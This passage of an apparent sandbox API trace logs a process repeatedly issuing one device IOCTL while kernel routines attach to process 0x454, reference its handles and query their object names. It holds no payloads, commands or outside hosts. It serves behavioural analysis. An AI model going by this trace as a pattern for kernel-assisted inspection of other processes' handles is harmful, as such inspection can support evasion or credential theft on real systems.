PsReleaseProcessExitSynchronization () returned 0x2 [0141.629] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.629] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa6044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.629] ObfDereferenceObject (Object=0xfffffa80037b6730) returned 0x1 [0141.629] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0141.629] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0141.629] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0141.630] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0141.630] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0141.630] PsAcquireProcessExitSynchronization () returned 0x0 [0141.630] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0141.630] ObReferenceObjectByHandle (in: Handle=0x2c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003886670, HandleInformation=0x0) returned 0x0 [0141.630] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0141.630] PsReleaseProcessExitSynchronization () returned 0x2 [0141.630] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0141.630] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa7044, ReturnLength=0xfffff88005163508) returned 0x0 [0141.630] ObfDereferenceObject (Object=0xfffffa8003886670) returned 0x1 [0144.029] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.029] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.029] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.029] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0144.029] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.030] PsAcquireProcessExitSynchronization () returned 0x0 [0144.030] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.030] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00103f3f0, HandleInformation=0x0) returned 0x0 [0144.030] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.030] PsReleaseProcessExitSynchronization () returned 0x2 [0144.030] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.030] ObQueryNameString (in: Object=0xfffff8a00103f3f0, ObjectNameInfo=0xfffffa8002f0d484, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f0d484, ReturnLength=0xfffff88005163550) returned 0x0 [0144.030] ObfDereferenceObject (Object=0xfffff8a00103f3f0) returned 0x1 [0144.030] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.030] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.030] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.030] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x122, lpOverlapped=0x0) returned 1 [0144.030] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.030] PsAcquireProcessExitSynchronization () returned 0x0 [0144.030] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.031] ObReferenceObjectByHandle (in: Handle=0x2d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80038863d0, HandleInformation=0x0) returned 0x0 [0144.031] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.031] PsReleaseProcessExitSynchronization () returned 0x2 [0144.031] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.031] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80026a57c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80026a57c4, ReturnLength=0xfffff88005163508) returned 0x0 [0144.031] ObfDereferenceObject (Object=0xfffffa80038863d0) returned 0x1 [0144.031] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.031] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.031] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.031] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x144, lpOverlapped=0x0) returned 1 [0144.031] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.031] PsAcquireProcessExitSynchronization () returned 0x0 [0144.031] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.031] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003886280, HandleInformation=0x0) returned 0x0 [0144.031] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.031] PsReleaseProcessExitSynchronization () returned 0x2 [0144.031] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.031] ObQueryNameString (in: Object=0xfffffa8003886280, ObjectNameInfo=0xfffffa8002fa4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa4044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.031] ObfDereferenceObject (Object=0xfffffa8003886280) returned 0x11 [0144.031] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.031] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.032] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.032] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0144.032] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.032] PsAcquireProcessExitSynchronization () returned 0x0 [0144.032] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.032] ObReferenceObjectByHandle (in: Handle=0x2d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000f62610, HandleInformation=0x0) returned 0x0 [0144.032] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.032] PsReleaseProcessExitSynchronization () returned 0x2 [0144.032] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.032] ObQueryNameString (in: Object=0xfffff8a000f62610, ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.032] ObfDereferenceObject (Object=0xfffff8a000f62610) returned 0x4 [0144.032] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.032] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.032] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.032] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0144.032] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.076] PsAcquireProcessExitSynchronization () returned 0x0 [0144.076] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.076] ObReferenceObjectByHandle (in: Handle=0x2e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037855f0, HandleInformation=0x0) returned 0x0 [0144.077] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.078] PsReleaseProcessExitSynchronization () returned 0x2 [0144.078] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.078] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002456044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002456044, ReturnLength=0xfffff88005163508) returned 0x0 [0144.078] ObfDereferenceObject (Object=0xfffffa80037855f0) returned 0x1 [0144.078] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.078] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.078] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.078] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0144.078] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.078] PsAcquireProcessExitSynchronization () returned 0x0 [0144.078] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.078] ObReferenceObjectByHandle (in: Handle=0x32c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0144.078] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.078] PsReleaseProcessExitSynchronization () returned 0x2 [0144.078] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.078] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa8002fd7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd7044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.078] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0144.078] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.079] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.079] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.079] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0144.079] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.079] PsAcquireProcessExitSynchronization () returned 0x0 [0144.079] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.079] ObReferenceObjectByHandle (in: Handle=0x338, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010bbe70, HandleInformation=0x0) returned 0x0 [0144.079] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.079] PsReleaseProcessExitSynchronization () returned 0x2 [0144.079] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.079] ObQueryNameString (in: Object=0xfffff8a0010bbe70, ObjectNameInfo=0xfffffa8002f21044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f21044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.079] ObfDereferenceObject (Object=0xfffff8a0010bbe70) returned 0x7 [0144.079] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.079] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.079] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.080] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0144.080] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.080] PsAcquireProcessExitSynchronization () returned 0x0 [0144.080] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.080] ObReferenceObjectByHandle (in: Handle=0x340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010b4080, HandleInformation=0x0) returned 0x0 [0144.080] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.080] PsReleaseProcessExitSynchronization () returned 0x2 [0144.080] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.080] ObQueryNameString (in: Object=0xfffff8a0010b4080, ObjectNameInfo=0xfffffa8002fc2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fc2044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.080] ObfDereferenceObject (Object=0xfffff8a0010b4080) returned 0x2 [0144.080] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.080] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.080] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.080] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0144.080] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.080] PsAcquireProcessExitSynchronization () returned 0x0 [0144.080] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.080] ObReferenceObjectByHandle (in: Handle=0x348, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010acda0, HandleInformation=0x0) returned 0x0 [0144.080] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.080] PsReleaseProcessExitSynchronization () returned 0x2 [0144.080] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.081] ObQueryNameString (in: Object=0xfffff8a0010acda0, ObjectNameInfo=0xfffffa8002fc3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fc3044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.081] ObfDereferenceObject (Object=0xfffff8a0010acda0) returned 0x2 [0144.081] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.081] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.081] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.081] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0144.081] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.081] PsAcquireProcessExitSynchronization () returned 0x0 [0144.081] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.081] ObReferenceObjectByHandle (in: Handle=0x36c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037d5070, HandleInformation=0x0) returned 0x0 [0144.081] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.081] PsReleaseProcessExitSynchronization () returned 0x2 [0144.081] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.081] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa3044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa3044, ReturnLength=0xfffff88005163508) returned 0x0 [0144.081] ObfDereferenceObject (Object=0xfffffa80037d5070) returned 0x1 [0144.081] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.081] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.081] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.081] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0144.081] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.081] PsAcquireProcessExitSynchronization () returned 0x0 [0144.081] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.081] ObReferenceObjectByHandle (in: Handle=0x394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800380f5f0, HandleInformation=0x0) returned 0x0 [0144.082] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.082] PsReleaseProcessExitSynchronization () returned 0x2 [0144.082] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.082] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fc4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fc4044, ReturnLength=0xfffff88005163508) returned 0x0 [0144.082] ObfDereferenceObject (Object=0xfffffa800380f5f0) returned 0x1 [0144.082] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.082] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.082] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.082] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xf8, lpOverlapped=0x0) returned 1 [0144.082] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.082] PsAcquireProcessExitSynchronization () returned 0x0 [0144.082] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.082] ObReferenceObjectByHandle (in: Handle=0x404, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003876070, HandleInformation=0x0) returned 0x0 [0144.082] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.082] PsReleaseProcessExitSynchronization () returned 0x2 [0144.082] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.082] ObQueryNameString (in: Object=0xfffffa8003876070, ObjectNameInfo=0xfffffa8002fc7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fc7044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.083] ObfDereferenceObject (Object=0xfffffa8003876070) returned 0x2 [0144.083] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.083] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.083] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.083] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0144.083] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.083] PsAcquireProcessExitSynchronization () returned 0x0 [0144.083] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.083] ObReferenceObjectByHandle (in: Handle=0x408, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80034ac2e0, HandleInformation=0x0) returned 0x0 [0144.083] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.083] PsReleaseProcessExitSynchronization () returned 0x2 [0144.083] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.083] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f0d484, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f0d484, ReturnLength=0xfffff88005163508) returned 0x0 [0144.083] ObfDereferenceObject (Object=0xfffffa80034ac2e0) returned 0x1 [0144.083] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.084] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.084] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.084] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0144.084] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.084] PsAcquireProcessExitSynchronization () returned 0x0 [0144.084] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.084] ObReferenceObjectByHandle (in: Handle=0x420, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001112640, HandleInformation=0x0) returned 0x0 [0144.084] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.084] PsReleaseProcessExitSynchronization () returned 0x2 [0144.084] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.084] ObQueryNameString (in: Object=0xfffff8a001112640, ObjectNameInfo=0xfffffa80026a57c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026a57c4, ReturnLength=0xfffff88005163550) returned 0x0 [0144.084] ObfDereferenceObject (Object=0xfffff8a001112640) returned 0x2 [0144.084] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.084] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.084] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.084] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, 